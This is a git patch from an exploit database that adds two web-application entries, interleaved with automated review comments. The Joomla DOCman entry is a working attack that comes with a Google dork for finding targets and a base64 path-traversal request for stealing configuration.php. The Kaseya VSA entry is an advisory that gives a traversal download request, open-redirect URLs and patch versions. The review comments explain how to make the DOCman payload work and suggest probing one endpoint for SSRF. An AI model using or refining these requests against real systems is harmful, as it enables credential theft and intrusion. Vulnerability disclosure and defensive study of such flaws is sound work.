From 9657eacb4d019ef0950fcfa9b8603a554fd6c883 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 16 Jul 2015 05:01:51 +0000
Subject: [PATCH] DB: 2015-07-16 2 new exploits

---
 files.csv | 2 +
 platforms/php/webapps/37620.txt | 30 ++++++++++++++
 platforms/windows/webapps/37621.txt | 63 +++++++++++++++++++++++++++++
 3 files changed, 95 insertions(+)
 create mode 100755 platforms/php/webapps/37620.txt
 create mode 100755 platforms/windows/webapps/37621.txt

diff --git a/files.csv b/files.csv
index 53e0e6f01..170e15f14 100755
--- a/files.csv
+++ b/files.csv
@@ -33878,6 +33878,7 @@ id,file,description,date,author,platform,type,port
 37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
 37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
 37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
+37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities",2015-07-15,"Pedro Ribeiro",windows,webapps,0
 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
 37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
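Review bot: The new 37621 row is inserted between ids 37528 and 37530, while the other new entry 37620 is appended at the end of the file in the second hunk; the surrounding index is in ascending id order, so 37621 belongs after 37620 rather than in the gap where 37529 would sit. The row also records port 0 for an HTTP-facing web application, whereas comparable php/webapps rows such as 37528 and 37620 use 80 — if the port column is meant to carry the service port, `80` would be the consistent value here.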
@@ -33954,3 +33955,4 @@ id,file,description,date,author,platform,type,port
 37615,platforms/php/webapps/37615.txt,"PBBoard member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
 37616,platforms/php/webapps/37616.txt,"PBBoard admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
 37617,platforms/php/webapps/37617.txt,"dirLIST Multiple Local File Include and Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
+37620,platforms/php/webapps/37620.txt,"Joomla DOCman Component - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
diff --git a/platforms/php/webapps/37620.txt b/platforms/php/webapps/37620.txt
new file mode 100755
index 000000000..2a3cf356f
--- /dev/null
+++ b/platforms/php/webapps/37620.txt
@@ -0,0 +1,30 @@
+# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
+# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
+# Risk: High
+# Author: Hugo Santiago dos Santos
+# Contact: hugo.s@linuxmail.org
+# Date: 13/07/2015
+# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
+# Google Dork: inurl:"/components/com_docman/dl2.php"
+
+# Xploit (FPD):
+
+ Get one target and just download with blank parameter:
+ http://www.site.com/components/com_docman/dl2.php?archive=0&file=
+
+ In title will occur Full Path Disclosure of server.
+
+# Xploit (LFD/LFI):
+
+ http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
+
+ Let's Xploit...
+
+ First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
+
+ ../../../../../../../target/www/configuration.php <= Not Ready
+
+ http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !
+
+
+And Now we have a configuration file...
\ No newline at end of file
diff --git a/platforms/windows/webapps/37621.txt b/platforms/windows/webapps/37621.txt
new file mode 100755
index 000000000..ed70a2f2c
--- /dev/null
+++ b/platforms/windows/webapps/37621.txt
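Review bot: The advisory names no affected or fixed DOCman version and no vendor fix, so a reader cannot tell which installations are exposed; an `# Affected versions:` / `# Fixed in:` pair next to `# Vendor Homepage:` would make it actionable. The CWE-98 (file inclusion) label is not supported by what the text shows: dl2.php is demonstrated returning the contents of a base64-encoded, traversal-laden `file` path, which is arbitrary file read via path traversal (CWE-22), and calling it LFI is an overstatement unless the script actually includes the file. It would also help to state that `../../../../../../../target/www/configuration.php` is a placeholder to be rebuilt from the path leaked by the FPD step before base64-encoding, because the encoded payload given decodes to exactly that placeholder and will not work as-is.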
@@ -0,0 +1,63 @@
+tl;dr
+Two vulns in Kaseya Virtual System Administrator - an authenticated
+arbitrary file download and two lame open redirects.
+
+Full advisory text below and at [1]. Thanks to CERT for helping me to
+disclose these vulnerabilities [2].
+
+>> Multiple vulnerabilities in Kaseya Virtual System Administrator
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
+==========================================================================
+Disclosure: 13/07/2015 / Last updated: 13/07/2015
+
+>> Background on the affected product:
+"Kaseya VSA is an integrated IT Systems Management platform that can
+be leveraged seamlessly across IT disciplines to streamline and
+automate your IT services. Kaseya VSA integrates key management
+capabilities into a single platform. Kaseya VSA makes your IT staff
+more productive, your services more reliable, your systems more
+secure, and your value easier to show."
+
+
+>> Technical details:
+#1
+Vulnerability: Arbitary file download (authenticated)
+Affected versions: unknown, at least v9
+
+GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
+Referer: http://10.0.0.3/
+
+A valid login is needed, and the Referrer header must be included. A
+sample request can be obtained by downloading any file attached to any
+ticket, and then modifying it with the appropriate path traversal.
+This will download the C:\boot.ini file when Kaseya is installed in
+the default C:\Kaseya directory. The file download root is the
+WebPages directory (\WebPages\).
+
+
+#2
+Vulnerability: Open redirect (unauthenticated)
+Affected versions: unknown, at least v7 to XXX
+
+a)
+http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com
+
+b)
+GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
+Host: www.google.com
+(host header has to be spoofed to the target)
+
+
+>> Fix:
+R9.1: install patch 9.1.0.4
+R9.0: install patch 9.0.0.14
+R8.0: install patch 8.0.0.18
+V7.0: install patch 7.0.0.29
+
+================
+Agile Information Security Limited
+http://www.agileinfosec.co.uk/
+>> Enabling secure digital business >>
+
+[1] https://raw.githubusercontent.com/pedrib/PoC/master/generic/kaseya-vsa-vuln.txt
+[2] https://www.kb.cert.org/vuls/id/919604
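Review bot: `Affected versions: unknown, at least v7 to XXX` under #2 still carries an unfilled placeholder; the Fix section lists patches for 7.0 through 9.1, so presumably this should read `Affected versions: unknown, at least v7 to v9.1`. In #1 the prose says the "Referrer header" must be included while the request uses the real header name `Referer` — using the actual spelling avoids readers sending a misspelled header the server ignores, and `Arbitary` in the heading is a typo for `Arbitrary`. For redirect (b), the note that the Host header must be spoofed to the redirect target means a victim's browser would never produce that request on its own, which limits its value as an open redirect; since the endpoint is named LocalProxy.ashx and takes a `url` parameter, it is worth confirming whether it fetches the URL server-side (SSRF) rather than merely redirecting, as that would change the severity considerably.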